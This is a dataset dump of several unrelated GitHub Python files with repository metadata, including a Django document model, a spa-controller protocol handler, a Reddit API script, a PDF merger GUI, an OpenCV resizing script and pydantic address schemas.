_get_tags(cls, tags):\n r = []\n for t in tags.split(\",\"):\n r.append(Tag.objects.get_or_create(\n slug=slugify(t),\n defaults={\"name\": t}\n )[0])\n return tuple(r)\n\n @classmethod\n def _get_extension(cls, extension):\n r = extension.lower()\n if r == \"jpeg\":\n return \"jpg\"\n if r == \"tif\":\n return \"tiff\"\n return r\n\n @classmethod\n def _mangle_property(cls, properties, name):\n if name in properties:\n properties[name] = getattr(cls, \"_get_{}\".format(name))(\n properties[name]\n )\n\n @classmethod\n def from_path(cls, path):\n \"\"\"\n We use a crude naming convention to make handling the correspondent,\n title, and tags easier:\n \"<date> - <correspondent> - <title> - <tags>.<suffix>\"\n \"<correspondent> - <title> - <tags>.<suffix>\"\n \"<correspondent> - <title>.<suffix>\"\n \"<title>.<suffix>\"\n \"\"\"\n\n for regex in cls.REGEXES.values():\n m = regex.match(os.path.basename(path))\n if m:\n properties = m.groupdict()\n cls._mangle_property(properties, \"created\")\n cls._mangle_property(properties, \"correspondent\")\n cls._mangle_property(properties, \"title\")\n cls._mangle_property(properties, \"tags\")\n cls._mangle_property(properties, \"extension\")\n return cls(**properties)\n", "repo_name": "madhavrn/paperless", "sub_path": "src/documents/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 14894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.db.models.Model", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 62, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 62, "usage_type": "name"}, {"api_name": "re.IGNORECASE", "line_number": 96, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 100, "usage_type": "call"}, {"api_name": "re.search", "line_number": 108, "usage_type": "call"}, {"api_name": "re.search", "line_number": 113, "usage_type": "call"}, {"api_name": "re.search", "line_number": 117, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 118, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 121, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 122, "usage_type": "call"}, {"api_name": "fuzzywuzzy.fuzz.partial_ratio", "line_number": 127, "usage_type": "call"}, {"api_name": "fuzzywuzzy.fuzz", "line_number": 127, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 141, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 142, "usage_type": "call"}, {"api_name": "django.utils.text.slugify", "line_number": 151, "usage_type": "call"}, {"api_name": "django.db.models.Model.save", "line_number": 153, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 153, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 153, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 160, "usage_type": "call"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 184, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 184, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 187, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 187, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 207, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 207, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 212, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 212, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 215, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 215, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 217, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 217, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 224, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 224, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 230, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 230, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 233, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 233, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 242, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 242, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 243, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 243, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 244, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 247, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 247, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 254, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 254, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 255, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 255, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 276, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 277, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 277, "usage_type": "name"}, {"api_name": "django.utils.text.slugify", "line_number": 289, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 293, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path", "line_number": 302, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 303, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 303, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 315, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 318, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 318, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 322, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 323, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 324, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 325, "usage_type": "attribute"}, {"api_name": "django.db.models.UUIDField", "line_number": 328, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 328, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 329, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 329, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 330, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 330, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 330, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 331, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 331, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 332, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 332, "usage_type": "name"}, {"api_name": "managers.LogManager", "line_number": 334, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 351, "usage_type": "call"}, {"api_name": "django.db.models.Model.save", "line_number": 353, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 353, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 353, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 360, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 372, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 373, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 379, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 381, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 386, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 388, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 393, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 395, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 399, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 401, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 406, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 408, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 412, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 414, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 417, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 433, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 433, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 433, "usage_type": "name"}, {"api_name": "django.utils.text.slugify", "line_number": 442, "usage_type": "call"}, {"api_name": "django.utils.text.slugify", "line_number": 454, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path", "line_number": 487, "usage_type": "attribute"}]} +{"seq_id": "37972106912", "text": "from typing import Optional\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef detect_cycle(head: Optional[ListNode]) -> Optional[ListNode]:\n nodes_seen = set()\n node = head\n\n while node is not None:\n if node in nodes_seen:\n return node\n else:\n nodes_seen.add(node)\n node = node.next\n\n return None\n", "repo_name": "DmitryGubich/tasks", "sub_path": "tasks/06_2023/15/detect_cycle.py", "file_name": "detect_cycle.py", "file_ext": "py", "file_size_in_byte": 403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "42754526045", "text": "\"\"\" Gecko GETWC/WCGET/SETWC/WCSET/REQWC/WCREQ handlers \"\"\"\n\nimport logging\nimport struct\n\nfrom typing import Optional\n\nfrom ...config import GeckoConfig\nfrom .packet import GeckoPacketProtocolHandler\n\nGETWC_VERB = b\"GETWC\"\nWCGET_VERB = b\"WCGET\"\nSETWC_VERB = b\"SETWC\"\nWCSET_VERB = b\"WCSET\"\nREQWC_VERB = b\"REQWC\"\nWCREQ_VERB = b\"WCREQ\"\nWCERR_VERB = b\"WCERR\"\n\n\nGET_WATERCARE_FORMAT = \">B\"\nSET_WATERCARE_FORMAT = \">BB\"\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass GeckoWatercareProtocolHandler(GeckoPacketProtocolHandler):\n @staticmethod\n def request(seq, **kwargs):\n return GeckoWatercareProtocolHandler(\n content=b\"\".join([GETWC_VERB, struct.pack(\">B\", seq)]),\n timeout=GeckoConfig.PROTOCOL_TIMEOUT_IN_SECONDS,\n retry_count=GeckoConfig.PROTOCOL_RETRY_COUNT,\n on_retry_failed=GeckoPacketProtocolHandler._default_retry_failed_handler,\n **kwargs,\n )\n\n @staticmethod\n def set(seq, mode, **kwargs):\n return GeckoWatercareProtocolHandler(\n content=b\"\".join(\n [SETWC_VERB, struct.pack(SET_WATERCARE_FORMAT, seq, mode)]\n ),\n timeout=GeckoConfig.PROTOCOL_TIMEOUT_IN_SECONDS,\n retry_count=GeckoConfig.PROTOCOL_RETRY_COUNT,\n **kwargs,\n )\n\n @staticmethod\n def response(mode, **kwargs):\n return GeckoWatercareProtocolHandler(\n content=b\"\".join(\n [\n WCGET_VERB,\n struct.pack(\n GET_WATERCARE_FORMAT,\n mode,\n ),\n ]\n ),\n **kwargs,\n )\n\n @staticmethod\n def giveschedule(**kwargs):\n return GeckoWatercareProtocolHandler(\n content=b\"\".join(\n [\n WCREQ_VERB,\n b\"\\x00\\x00\\x00\\x01\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x02\\x01\\x00\\x01\\x05\"\n b\"\\x06\\x00\\x12\\x00\\x03\\x01\\x00\\x00\\x06\\x06\\x00\\x12\\x00\\x04\\x01\\x00\"\n b\"\\x01\\x05\\x00\\x00\\x00\\x00\",\n ]\n ),\n **kwargs,\n )\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.mode: Optional[int] = None\n self.schedule = False\n\n def can_handle(self, received_bytes: bytes, sender: tuple) -> bool:\n return (\n received_bytes.startswith(GETWC_VERB)\n or received_bytes.startswith(WCGET_VERB)\n or received_bytes.startswith(REQWC_VERB)\n or received_bytes.startswith(WCSET_VERB)\n )\n\n def handle(self, received_bytes: bytes, sender: tuple) -> None:\n remainder = received_bytes[5:]\n if received_bytes.startswith(GETWC_VERB):\n self._sequence = struct.unpack(\">B\", remainder)[0]\n self.schedule = False\n return # Stay in the handler list\n if received_bytes.startswith(REQWC_VERB):\n self._sequence = struct.unpack(\">B\", remainder)[0]\n self.schedule = True\n return # Stay in the handler list\n if received_bytes.startswith(WCGET_VERB):\n self.mode = struct.unpack(GET_WATERCARE_FORMAT, remainder)[0]\n self.schedule = False\n # Otherwise must be WCSET\n self._should_remove_handler = True\n\n\nclass GeckoWatercareErrorHandler(GeckoPacketProtocolHandler):\n def can_handle(self, received_bytes: bytes, sender: tuple) -> bool:\n return received_bytes.startswith(WCERR_VERB)\n\n def handle(self, received_bytes: bytes, sender: tuple):\n pass\n", "repo_name": "gazoodle/geckolib", "sub_path": "src/geckolib/driver/protocol/watercare.py", "file_name": "watercare.py", "file_ext": "py", "file_size_in_byte": 3584, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 52, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "packet.GeckoPacketProtocolHandler", "line_number": 26, "usage_type": "name"}, {"api_name": "struct.pack", "line_number": 30, "usage_type": "call"}, {"api_name": "config.GeckoConfig.PROTOCOL_TIMEOUT_IN_SECONDS", "line_number": 31, "usage_type": "attribute"}, {"api_name": "config.GeckoConfig", "line_number": 31, "usage_type": "name"}, {"api_name": "config.GeckoConfig.PROTOCOL_RETRY_COUNT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "config.GeckoConfig", "line_number": 32, "usage_type": "name"}, {"api_name": "packet.GeckoPacketProtocolHandler._default_retry_failed_handler", "line_number": 33, "usage_type": "attribute"}, {"api_name": "packet.GeckoPacketProtocolHandler", "line_number": 33, "usage_type": "name"}, {"api_name": "struct.pack", "line_number": 41, "usage_type": "call"}, {"api_name": "config.GeckoConfig.PROTOCOL_TIMEOUT_IN_SECONDS", "line_number": 43, "usage_type": "attribute"}, {"api_name": "config.GeckoConfig", "line_number": 43, "usage_type": "name"}, {"api_name": "config.GeckoConfig.PROTOCOL_RETRY_COUNT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "config.GeckoConfig", "line_number": 44, "usage_type": "name"}, {"api_name": "struct.pack", "line_number": 54, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 79, "usage_type": "name"}, {"api_name": "struct.unpack", "line_number": 93, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 97, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 101, "usage_type": "call"}, {"api_name": "packet.GeckoPacketProtocolHandler", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "577098699", "text": "#!/usr/bin/python3\n\"\"\"prints the titles of the first 10 hot posts listed for a given subreddit\nIf not a valid subreddit, print None.\"\"\"\n\nfrom requests import get\n\n\ndef top_ten(subreddit):\n \"\"\"prints the titles of the first 10 hot posts listed for a given subreddit\n\n Args:\n subreddit (str): the subreddit to be queried\n \"\"\"\n\n try:\n base_url =\\\n f'https://www.reddit.com/r/{subreddit}/hot.json?limit=10'\n request = get(base_url,\n headers={\n 'user-agent': 'learn api by Careful_Reality8307'\n })\n if request.is_redirect:\n return\n [print(i['data']['title']) for i in request.json()['data']['children']]\n except Exception:\n print('None')\n", "repo_name": "mdesignscode/alx-system_engineering-devops", "sub_path": "0x16-api_advanced/1-top_ten.py", "file_name": "1-top_ten.py", "file_ext": "py", "file_size_in_byte": 779, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "6725072293", "text": "import tkinter.messagebox\nimport tkinter as tk\nfrom tkinter import filedialog as fd\nfrom PyPDF2 import PdfMerger, PdfReader #引入\n\n# step1: select the files to be processed(default order)\ndef select():\n global file_s\n file_s=fd.askopenfilenames(filetypes=[(\"pdf文件\",\".pdf\")])\n if file_s!='':\n pic_in.set(file_s)\n button_out['state']='normal'\n return None\n\n# step2: select the folder to output the pdf file\ndef select_out():\n global path_save\n path_save=fd.askdirectory()\n if path_save!='':\n pdf_out.set(path_save)\n button_on['state']='normal'\n\n# step3: write the pictures into a pdf\ndef combine():\n file_merger = PdfMerger(strict=False)\n path=path_save+\"/combine_result.pdf\"\n for pdf in file_s:\n file_merger.append(PdfReader(pdf), 'tag')\n file_merger.add_metadata(\n {u'/Title': u'my title', u'/Creator': u'creator', '/Subject': 'subjects'})\n with open(path, 'wb+') as fa:\n file_merger.write(fa)\n tkinter.messagebox.showinfo('Successfully operated!')\n fa.close()\n file_merger.close()\n return None\n\n# GUI initialize\ndef main(root3):\n global pic_in, pdf_out, on, entry_out, button_out, button_on\n pic_in = tk.StringVar()\n pdf_out = tk.StringVar()\n on = tk.StringVar()\n label_input = tk.Label(root3, text='①选择要合并的pdf:')\n entry_input = tk.Entry(root3, textvariable=pic_in, width=45)\n button_input = tk.Button(root3, text='①选择要合并的pdf', command=select)\n label_out = tk.Label(root3, text='②选择输出文件夹:(输出结果为该文件夹下的combine_result.pdf)')\n entry_out = tk.Entry(root3, textvariable=pdf_out, width=45)\n button_out = tk.Button(root3, text='②选择保存位置', command=select_out)\n button_out['state'] = 'disabled'\n button_on = tk.Button(root3, text='③执行', command=combine, width=20, height=3)\n button_on['state'] = 'disabled'\n label_input.place(x=10,y=10)\n entry_input.place(x=10, y=35)\n button_input.place(x=350, y=32)\n label_out.place(x=10, y=80)\n entry_out.place(x=10, y=105)\n button_out.place(x=350, y=97)\n button_on.place(x=150, y=150)\n \nglobal pic_in, pdf_out, on, entry_out, button_out, button_on\n \nroot2 = tk.Tk()\nsw = root2.winfo_screenwidth()\nsh = root2.winfo_screenheight()\nc = (sw - 400) / 2\nd = (sh - 300) / 2\nroot2.geometry('500x300+%d+%d'%(c, d))\nroot2.title('PDF合并')\nroot2.resizable(width=False, height=False)\nroot = tk.Frame(root2, width=605, height=500)\nroot.place(x=0, y=0)\n\nmain(root)\nroot2.mainloop()\r\n", "repo_name": "WampB/PDF_tools", "sub_path": "PDF_combine_GUI.py", "file_name": "PDF_combine_GUI.py", "file_ext": "py", "file_size_in_byte": 2561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "tkinter.filedialog.askopenfilenames", "line_number": 9, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 9, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askdirectory", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 18, "usage_type": "name"}, {"api_name": "PyPDF2.PdfMerger", "line_number": 25, "usage_type": "call"}, {"api_name": "PyPDF2.PdfReader", "line_number": 28, "usage_type": "call"}, {"api_name": "tkinter.messagebox.messagebox.showinfo", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.messagebox.messagebox", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox", "line_number": 33, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 41, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 42, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 43, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 45, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 46, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 49, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 63, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "22195127676", "text": "import cv2 as cv\nfrom cv2 import INTER_AREA\nfrom cv2 import INTER_LINEAR\nfrom cv2 import INTER_CUBIC\nfrom matplotlib.pyplot import sca\nimport numpy as np\n\n\nvideo = input(\"Type either 'livefeed' or 'file': \")\nscale = input(\"Please enter a scale factor (value from 0-1: \")\ninterpolation = input(\"Type one digit of the following, 1 = Inter_Area, 2 = Linear, 3 = Cubic: \")\n\ndef scale_frame(frame, scale):\n # read the actual height and weight, scale it and store\n height = (frame.shape[0]*scale)\n width = (frame.shape[1]*scale)\n \n\n #return the scaled frame\n \n if interpolation == '1':\n return cv.resize(frame, (150, 150), (255,255), fx = 250, fy=250, interpolation=cv.INTER_AREA) # performs rescaling by area interpolation\n elif interpolation == '2':\n return cv.resize(frame, (150, 150), (255,255), fx = 250, fy=250, interpolation=cv.INTER_LINEAR) # performs rescaling by linear interpolation\n elif interpolation == '3':\n return cv.resize(frame, (150, 150), (255,255), fx = 250, fy=250, interpolation=cv.INTER_CUBIC) # performs rescaling by cubic interpolation\n\nif video == 'livefeed':\n video_location = 0\n def read_video(video_location, scale, side_by_side=False):\n \n if scale != 1 and scale != 0: \n try:\n capture = cv.VideoCapture(video_location)\n while True:\n isTrue, frame = capture.read()\n scaled_frame = scale_frame(frame, scale) # calls the scale_frame function to scale each frame \n \n cv.imshow('scaled video', scaled_frame)\n if side_by_side:\n cv.imshow('original video', frame)\n \n if cv.waitKey(20) & 0XFF == ord('d'):\n break\n capture.release()\n \n \n finally:\n cv.destroyAllWindows()\n else:\n print(f'The scale factor {scale} is not valid !!')\n read_video(video_location=0,scale=scale,side_by_side=False)\n\nelif(video == 'file'):\n video_location = input(\"Please enter the location of your video file: \")\n def read_video(source, scale, side_by_side=False):\n if scale != 1 and scale > 0: \n try:\n capture = cv.VideoCapture(source)\n while True:\n isTrue, frame = capture.read()\n scaled_frame = scale_frame(frame, scale) # calls the scale_frame function to scale each frame \n \n cv.imshow('scaled video', scaled_frame)\n if side_by_side:\n cv.imshow('original video', frame)\n \n if cv.waitKey(20) & 0XFF == ord('d'):\n break\n capture.release()\n except:\n print('error')\n finally:\n cv.destroyAllWindows()\n else:\n print(f'The scale factor {scale} is not valid !!')", "repo_name": "Sebsaurus/AR-VR-coursework", "sub_path": "test2.py", "file_name": "test2.py", "file_ext": "py", "file_size_in_byte": 3050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "21197000603", "text": "\"\"\"\nA module for address in the app-schemas package.\n\"\"\"\nfrom datetime import datetime\nfrom typing import Optional\nfrom uuid import uuid4\n\nfrom pydantic import UUID4, BaseModel, ConfigDict, Field\n\nfrom app.config.config import init_setting, sql_database_setting\n\n\nclass AddressID(BaseModel):\n \"\"\"\n Schema for representing an Address's ID.\n \"\"\"\n\n id: UUID4 = Field(\n default_factory=UUID4, title=\"ID\", description=\"ID of the Address\"\n )\n\n model_config = ConfigDict(\n json_schema_extra={\"example\": {\"id\": str(uuid4())}}\n )\n\n\nclass AddressUpdatedAt(BaseModel):\n \"\"\"\n Schema for representing the update timestamp of an Address.\n \"\"\"\n\n updated_at: Optional[datetime] = Field(\n default=None,\n title=\"Updated at\",\n description=\"Time the Address was updated\",\n )\n\n model_config = ConfigDict(\n json_schema_extra={\n \"example\": {\n \"updated_at\": str(datetime.now()),\n }\n },\n )\n\n\nclass AddressUpdate(BaseModel):\n \"\"\"\n Schema for the Address of a User.\n \"\"\"\n\n street_address: str = Field(\n ...,\n title=\"Street Address\",\n description=\"Full street address component, which may include house\"\n \" number, street name, Post Office Box, and multi-line\"\n \" extended street address information. This field ma\"\n \"y contain multiple lines, separated by newlines.\",\n min_length=3,\n )\n locality: str = Field(\n ...,\n title=\"Locality (City)\",\n description=\"City or locality component.\",\n min_length=3,\n max_length=85,\n )\n\n model_config = ConfigDict(\n json_schema_extra={\n \"example\": {\n \"street_address\": \"Blvd 9 de Octubre\",\n \"locality\": \"Guayaquil\",\n }\n },\n )\n\n\nclass AddressResponse(AddressUpdate):\n \"\"\"\n Schema for representing the Address of a User.\n \"\"\"\n\n region: str = Field(\n default=init_setting.DEFAULT_REGION,\n title=\"Region (State/Province)\",\n description=\"State, province, prefecture, or region component.\",\n min_length=4,\n max_length=35,\n )\n country: str = Field(\n default=init_setting.DEFAULT_COUNTRY,\n title=\"Country\",\n description=\"Country name component.\",\n min_length=4,\n max_length=60,\n )\n\n model_config = ConfigDict(\n json_schema_extra={\n \"example\": {\n \"street_address\": \"Blvd 9 de Octubre\",\n \"locality\": \"Guayaquil\",\n \"region\": init_setting.DEFAULT_REGION,\n \"country\": init_setting.DEFAULT_COUNTRY,\n }\n },\n )\n\n\nclass Address(AddressResponse):\n \"\"\"\n Schema for representing the Address for JWT.\n \"\"\"\n\n postal_code: Optional[str] = Field(\n None,\n title=\"Postal Code\",\n min_length=6,\n max_length=6,\n pattern=sql_database_setting.DB_POSTAL_CODE_CONSTRAINT,\n description=\"Postal code should be a 6-digit number.\",\n )\n\n model_config = ConfigDict(\n from_attributes=True,\n json_schema_extra={\n \"example\": {\n \"street_address\": \"Blvd 9 de Octubre\",\n \"locality\": \"Guayaquil\",\n \"region\": init_setting.DEFAULT_REGION,\n \"country\": init_setting.DEFAULT_COUNTRY,\n \"postal_code\": \"090312\",\n }\n },\n )\n\n\nclass UserAddressInDB(AddressID, Address, AddressUpdatedAt):\n \"\"\"\n Schema for updating the Address of a User.\n \"\"\"\n\n model_config = ConfigDict(\n from_attributes=True,\n json_schema_extra={\n \"example\": {\n \"id\": str(uuid4()),\n \"street_address\": \"Blvd 9 de Octubre\",\n \"locality\": \"Guayaquil\",\n \"region\": init_setting.DEFAULT_REGION,\n \"country\": init_setting.DEFAULT_COUNTRY,\n \"postal_code\": \"090312\",\n \"created_at\": str(datetime.now()),\n \"updated_at\": str(datetime.now()),\n }\n },\n )\n\n created_at: datetime = Field(\n default_factory=datetime.now,\n title=\"Created at\",\n description=\"Time the User was created\",\n )\n", "repo_name": "jpcadena/fastapi-boilerplate", "sub_path": "app/schemas/external/address.py", "file_name": "address.py", "file_ext": "py", "file_size_in_byte": 4270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pydantic.BaseModel", "line_number": 13, "usage_type": "name"}, {"api_name": "pydantic.UUID4", "line_number": 18, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 18, "usage_type": "call"}, {"api_name": "pydantic.UUID4", "line_number": 19, "usage_type": "name"}, {"api_name": "pydantic.ConfigDict", "line_number": 22, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 23, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 32, "usage_type": "call"}, {"api_name": "pydantic.ConfigDict", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 47, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 52, "usage_type": "call"}, {"api_name": "pydantic.Field", "line_number": 61, "usage_type": "call"}, {"api_name": "pydantic.ConfigDict", "line_number": 69, "usage_type": "call"}, {"api_name": "pydantic.Field", "line_number": 84, "usage_type": "call"}, {"api_name": "app.config.config.init_setting.DEFAULT_REGION", "line_number": 85, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 85, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 91, "usage_type": "call"}, {"api_name": 